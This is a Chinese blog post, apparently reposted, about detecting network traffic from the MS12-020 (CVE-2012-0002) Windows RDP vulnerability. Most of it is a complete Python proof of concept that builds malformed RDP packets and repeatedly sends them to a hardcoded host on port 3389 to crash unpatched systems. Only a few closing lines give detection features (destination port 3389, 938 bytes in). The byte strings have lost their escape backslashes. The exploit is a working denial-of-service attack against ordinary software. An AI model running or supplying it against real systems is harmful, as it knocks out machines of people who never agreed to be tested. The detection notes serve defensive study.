zoukankan html css js c++ java

一个3389远程溢出漏洞的简单流量检测

CVE编号：CVE-2012-0002
CNNVD编号：CNNVD-201203-241
中文名：3389远程溢出漏洞/Microsoft Windows远程桌面协议代码执行漏洞
原文地址：http://blog.csdn.net/jiayanhui2877/article/details/47025247 ==>含有报文分析和特征提取，如果Buf搞不定，就看这个吧
脚本成功运行环境：windows系统，开启3389端口==>可进行TCP连接并发送buf
复现环境：XP系统、开启3389、未打补丁含有此漏洞
二进制的漏洞，精华所在是解析
相对的，msf也有exp，所以需要研究ruby语言，查看Exp

  1 # ms12-020 "chinese shit" PoC v2(wireshark version)
  2 #
  3 # tested on winsp3 spanish, reported towork on Win7, win 2008
  4 #
  5 # original source:http://115.com/file/be27pff7
  6 #
  7 #
  8 
  9 import socket
 10 import sys
 11 import time
 12 
 13 
 14 
 15 buf=""
 16 buf+="x03x00x00x13" # TPKT, Version3, lenght 19
 17 buf+="x0exe0x00x00x00x00x00x01x00x08x00x00x00x00x00"# ITU-T Rec X.224
 18 buf+="x03x00x01xd6" # TPKT,Version 3, lenght 470
 19 buf+="x02xf0x80" # ITU-T RecX.224
 20 
 21 
 22 buf+="x7fx65x82x01x94x04" #MULTIPOINT-COMMUNICATION-SERVICET.125
 23 buf+="x01x01x04x01x01x01x01xff"# "Fuck you Chelios" packet
 24 buf+="x30x19x02x04x00x00x00x22"#000000MaxchannelIDs result in bluescreen after 0x2c head len.
 25 buf+="x02x04x00x00x00x02x02x04"
 26 buf+="x00x00x00x00x02x04x00x00"
 27 buf+="x00x01x02x04x00x00x00x00"
 28 buf+="x02x04x00x00x00x01x02x02"
 29 buf+="xffxffx02x04x00x00x00x02"
 30 buf+="x30x19x02x04x00x00x00x01"
 31 buf+="x02x04x00x00x00x01x02x04"
 32 buf+="x00x00x00x01x02x04x00x00"
 33 buf+="x00x01x02x04x00x00x00x00"
 34 buf+="x02x04x00x00x00x01x02x02"
 35 buf+="x04x20x02x04x00x00x00x02"
 36 buf+="x30x1cx02x02xffxffx02x02"
 37 buf+="xfcx17x02x02xffxffx02x04"
 38 buf+="x00x00x00x01x02x04x00x00"
 39 buf+="x00x00x02x04x00x00x00x01"
 40 buf+="x02x02xffxffx02x04x00x00"
 41 buf+="x00x02x04x82x01x33x00x05"
 42 buf+="x00x14x7cx00x01x81x2ax00"
 43 buf+="x08x00x10x00x01xc0x00x44"
 44 buf+="x75x63x61x81x1cx01xc0xd8"
 45 buf+="x00x04x00x08x00x80x02xe0"
 46 buf+="x01x01xcax03xaax09x04x00"
 47 buf+="x00xcex0ex00x00x48x00x4f"
 48 buf+="x00x53x00x54x00x00x00x00"
 49 buf+="x00x00x00x00x00x00x00x00"
 50 buf+="x00x00x00x00x00x00x00x00"
 51 buf+="x00x00x00x00x00x04x00x00"
 52 buf+="x00x00x00x00x00x0cx00x00"
 53 buf+="x00x00x00x00x00x00x00x00"
 54 buf+="x00x00x00x00x00x00x00x00"
 55 buf+="x00x00x00x00x00x00x00x00"
 56 buf+="x00x00x00x00x00x00x00x00"
 57 buf+="x00x00x00x00x00x00x00x00"
 58 buf+="x00x00x00x00x00x00x00x00"
 59 buf+="x00x00x00x00x00x00x00x00"
 60 buf+="x00x00x00x00x00x00x00x00"
 61 buf+="x00x01xcax01x00x00x00x00"
 62 buf+="x00x10x00x07x00x01x00x30"
 63 buf+="x00x30x00x30x00x30x00x30"
 64 buf+="x00x2dx00x30x00x30x00x30"
 65 buf+="x00x2dx00x30x00x30x00x30"
 66 buf+="x00x30x00x30x00x30x00x30"
 67 buf+="x00x2dx00x30x00x30x00x30"
 68 buf+="x00x30x00x30x00x00x00x00"
 69 buf+="x00x00x00x00x00x00x00x00"
 70 buf+="x00x00x00x00x00x00x00x00"
 71 buf+="x00x00x00x00x00x04xc0x0c"
 72 buf+="x00x0dx00x00x00x00x00x00"
 73 buf+="x00x02xc0x0cx00x1bx00x00"
 74 buf+="x00x00x00x00x00x03xc0x2c"
 75 buf+="x00x03x00x00x00x72x64x70"
 76 buf+="x64x72x00x00x00x00x00x80"
 77 buf+="x80x63x6cx69x70x72x64x72"
 78 buf+="x00x00x00xa0xc0x72x64x70"
 79 buf+="x73x6ex64x00x00x00x00x00"
 80 buf+="xc0"
 81 
 82 buf+="x03x00x00x0c" # TPKT,Version 3, Lenght 12
 83 buf+="x02xf0x80"  # ITU-T Rec X.224
 84 buf+="x04x01x00x01x00" #MULTIPOINT-COMMUNICATION-SERVICE T.125
 85 buf+="x03x00x00x08" #TPKT,Version 3, Length 8
 86 buf+="x02xf0x80" # ITU-T RecX.224
 87 buf+="x28" #MULTIPOINT-COMM-SERVICE T.125
 88 buf+="x03x00x00x0c" # TPKT,Version 3, Lenght 12
 89 buf+="x02xf0x80" # ITU-T RecX.224
 90 buf+="x38x00x06x03xef" #MULTIPOINT-COMM-SERVICE T.125
 91 buf+="x03x00x00x0c" # TPKT,Version 3, Lenght 12
 92 buf+="x02xf0x80" #ITU-T RecX.224
 93 buf+="x38x00x06x03xeb" #MULTIPOINT-COMM-SERVICE T.125
 94 buf+="x03x00x00x0c" # TPKT,Version 3, Lenght 12
 95 buf+="x02xf0x80" #ITU-T RecX.224
 96 buf+="x38x00x06x03xec"#MULTIPOINT-COMM-SERVICE T.125
 97 buf+="x03x00x00x0c"  # TPKT, Version 3, Lenght 12
 98 buf+="x02xf0x80" #ITU-T RecX.224
 99 buf+="x38x00x06x03xed"#MULTIPOINT-COMM-SERVICE T.125
100 buf+="x03x00x00x0c" # TPKT,Version 3, Lenght 12
101 buf+="x02xf0x80" #ITU-T RecX.224
102 buf+="x38x00x06x03xee"#MULTIPOINT-COMM-SERVICE T.125
103 buf+="x03x00x00x0b" # TPKT,Version 3, Lenght 12
104 buf+="x06xd0x00x00x12x34x00"  #ITU-T Rec X.224
105 
106 
107 buf1 = ""
108 buf1 +="x03x00x00x13x0exe0x00x00"
109 buf1 +="x00x00x00x01x00x08x00x00"
110 buf1 +="x00x00x00x03x00x01xd6x02"
111 buf1 +="xf0x80x7fx65x82x01x94x04"
112 
113 buf1 += "x01x01x04x01x01x01x01xff"
114 buf1 +="x30x19x02x04x00x00x00x22"
115 buf1 +="x02x04x00x00x00x0ax02x04"
116 buf1 +="x00x00x00x00x02x04x00x00"
117 buf1 +="x00x01x02x04x00x00x00x00"
118 buf1 +="x02x04x00x00x00x01x02x02"
119 buf1 +="xffxffx02x04x00x00x00x02"
120 buf1 +="x30x19x02x04x00x00x00x01"
121 buf1 +="x02x04x00x00x00x01x02x04"
122 buf1 +="x00x00x00x01x02x04x00x00"
123 buf1 +="x00x01x02x04x00x00x00x00"
124 buf1 += "x02x04x00x00x00x01x02x02"
125 buf1 +="x04x20x02x04x00x00x00x02"
126 buf1 +="x30x1cx02x02xffxffx02x02"
127 buf1 +="xfcx17x02x02xffxffx02x04"
128 buf1 +="x00x00x00x01x02x04x00x00"
129 buf1 +="x00x00x02x04x00x00x00x01"
130 buf1 += "x02x02xffxffx02x04x00x00"
131 buf1 +="x00x02x04x82x01x33x00x05"
132 buf1 +="x00x14x7cx00x01x81x2ax00"
133 buf1 +="x08x00x10x00x01xc0x00x44"
134 buf1 +="x75x63x61x81x1cx01xc0xd8"
135 buf1 +="x00x04x00x08x00x80x02xe0"
136 buf1 += "x01x01xcax03xaax09x04x00"
137 buf1 +="x00xcex0ex00x00x48x00x4f"
138 buf1 +="x00x53x00x54x00x00x00x00"
139 buf1 +="x00x00x00x00x00x00x00x00"
140 buf1 +="x00x00x00x00x00x00x00x00"
141 buf1 +="x00x00x00x00x00x04x00x00"
142 buf1 +="x00x00x00x00x00x0cx00x00"
143 buf1 +="x00x00x00x00x00x00x00x00"
144 buf1 +="x00x00x00x00x00x00x00x00"
145 buf1 +="x00x00x00x00x00x00x00x00"
146 buf1 +="x00x00x00x00x00x00x00x00"
147 buf1 += "x00x00x00x00x00x00x00x00"
148 buf1 +="x00x00x00x00x00x00x00x00"
149 buf1 +="x00x00x00x00x00x00x00x00"
150 buf1 +="x00x00x00x00x00x00x00x00"
151 buf1 +="x00x01xcax01x00x00x00x00"
152 buf1 +="x00x10x00x07x00x01x00x30"
153 buf1 += "x00x30x00x30x00x30x00x30"
154 buf1 +="x00x2dx00x30x00x30x00x30"
155 buf1 +="x00x2dx00x30x00x30x00x30"
156 buf1 +="x00x30x00x30x00x30x00x30"
157 buf1 +="x00x2dx00x30x00x30x00x30"
158 buf1 +="x00x30x00x30x00x00x00x00"
159 buf1 += "x00x00x00x00x00x00x00x00"
160 buf1 +="x00x00x00x00x00x00x00x00"
161 buf1 +="x00x00x00x00x00x04xc0x0c"
162 buf1 +="x00x0dx00x00x00x00x00x00"
163 buf1 +="x00x02xc0x0cx00x1bx00x00"
164 buf1 +="x00x00x00x00x00x03xc0x2c"
165 buf1 += "x00x03x00x00x00x72x64x70"
166 buf1 +="x64x72x00x00x00x00x00x80"
167 buf1 +="x80x63x6cx69x70x72x64x72"
168 buf1 +="x00x00x00xa0xc0x72x64x70"
169 buf1 +="x73x6ex64x00x00x00x00x00"
170 buf1 +="xc0x03x00x00x0cx02xf0x80"
171 buf1 +="x04x01x00x01x00x03x00x00"
172 buf1 +="x08x02xf0x80x28x03x00x00"
173 buf1 +="x08x02xf0x80x28x03x00x00"
174 buf1 +="x08x02xf0x80x28x03x00x00"
175 buf1 +="x08x02xf0x80x28x03x00x00"
176 buf1 += "x08x02xf0x80x28x03x00x00"
177 buf1 +="x08x02xf0x80x28x03x00x00"
178 buf1 +="x08x02xf0x80x28x03x00x00"
179 buf1 +="x08x02xf0x80x28x03x00x00"
180 buf1 +="x08x02xf0x80x28x03x00x00"
181 buf1 +="x08x02xf0x80x28x03x00x00"
182 buf1 += "x0cx02xf0x80x38x00x06x03"
183 buf1 +="xeax03x00x00x0cx02xf0x80"
184 buf1 +="x38x00x06x03xebx03x00x00"
185 buf1 +="x0cx02xf0x80x38x00x06x03"
186 buf1 +="xecx03x00x00x0cx02xf0x80"
187 buf1 +="x38x00x06x03xedx03x00x00"
188 buf1 += "x0cx02xf0x80x38x00x06x03"
189 buf1 +="xeex03x00x00x0cx02xf0x80"
190 buf1 +="x38x00x06x03xf0x03x00x00"
191 buf1 +="x0cx02xf0x80x38x00x06x03"
192 buf1 +="xf1x03x00x00x0cx02xf0x80"
193 buf1 +="x38x00x06x03xf2x03x00x00"
194 buf1 += "x0cx02xf0x80x38x00x06x03"
195 buf1 +="xf3x03x00x00x09x02xf0x80"
196 buf1 += "x21x80"
197 
198 #buf1 is for win xp ,buf2 is for win7win2003
199 #HOST = sys.argv[1]
200 HOST = '172.16.101.173'
201 PORT = 3389
202 for i in range(1000):
203          s= socket.socket(socket.AF_INET, socket.SOCK_STREAM)
204          s.connect((HOST,PORT))
205          print"sending: %d bytes" % len(buf1)
206          s.send(buf1)
207          #rec= s.recv(100)
208          #print"received: %d bytes" % len(rec)
209          s.close()
210          time.sleep(1)

因为日志数据并没有给全，解析不完全，所以关键的Buf是没有的。

经过测试，两个特征

1. destPort:3389

2. bytesIn:938

这需要大量数据检测可能误报的数目、概率

查看全文

相关阅读:
夺命雷公狗---DEDECMS----21dedecms按照地区取出电影内容
 夺命雷公狗---DEDECMS----20dedecms取出栏目页对应的内容
 夺命雷公狗---DEDECMS----19dedecms栏目列表页的完成
 夺命雷公狗---DEDECMS----18dedecms之无可奈何标签-sql标签取出今天更新
 mysql取出现在的时间戳和时间时间戳转成人类看得懂的时间
 SQL语句：find_in_set的使用方法
 夺命雷公狗---DEDECMS----17dedecms头条信息的取出
 夺命雷公狗---DEDECMS----16dedecms取出首页今日更新
 夺命雷公狗---DEDECMS----15dedecms首页栏目列表页导航部分完成
 夺命雷公狗---DEDECMS----14dedecms首页导航条的完成

原文地址：https://www.cnblogs.com/huim/p/7570776.html